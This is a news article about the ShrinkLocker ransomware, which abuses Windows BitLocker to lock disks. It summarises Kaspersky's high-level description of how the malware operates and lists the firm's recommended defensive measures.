Security software company Kaspersky Lab has recently detected a new ransomware strain called ShrinkLocker that exploits Windows’ BitLocker security function. The malicious software restricts access to a device until a ransom is paid to unlock it. Kaspersky Lab has offered advice on how to protect against potential data blocking.
Understanding BitLocker and ShrinkLocker
BitLocker is a disc encryption tool, first introduced in Windows Vista in 2007. It is used to secure entire volumes of data from unauthorized access, especially in cases of physical disk access. From Windows 10 onwards, BitLocker uses 128-bit and 256-bit XTS-AES encryption algorithms for added protection against manipulation-based attacks.
ShrinkLocker, detected in Mexico, Indonesia, and Jordan, uses BitLocker in a unique way. It shrinks the size of each logical disk by 100MB and then creates new, similarly-sized partitions from the freed-up space, hence the term ShrinkLocker.
Persistent and Evolving Threats
According to experts, cybercriminals continue to evolve their tactics to evade detection. In this case, they utilized a legitimate encryption function to block user access to files. Earlier instances of BitLocker use by malicious software have been reported, such as by Iranian ransomware actors in 2022 and during an attack on the Russian firm Miratorg, which saw all files encrypted by Bitlocker.
ShrinkLocker Operational Tactics
Once activated on a device, ShrinkLocker runs a VisualBasic script that uses WMI to gather information about the operating system and hardware platform. The script terminates automatically if it detects outdated Windows XP, 2000, 2003, or Vista. It then proceeds to adjust disk sizes based on the Windows version while ignoring network disks to avoid triggering defense systems.
The Final Stage of the Attack
The final stage of the attack sees the disabling of BitLocker’s built-in encryption key recovery tools and the setting of a numerical password. This is done to hinder the legitimate owner’s access to the encrypted data. Subsequently, a unique 64-character password made up of numbers, letters, and special symbols is generated via a random algorithm. Upon restarting, the user is asked to input this password to decrypt the disks.
Challenges and Recommendations for Protection
Decrypting data without the encryption key is extremely difficult as each password generation algorithm is unique to the attacked system. No specific protective measures against ShrinkLocker have been developed as yet. However, Kaspersky Lab advises the following:
- Enable network traffic registration and monitoring and set up GET and POST query logs as inn case of infection, the queries to the attacker’s domain may contain passwords or keys.
- Track events related to VBS and PowerShell execution and store scripts and commands in an external repository.
- Use robust passwords and two-factor authentication wherever possible.
- Regularly back up important data.
In addition, antivirus software can help in early detection and blocking of such attacks.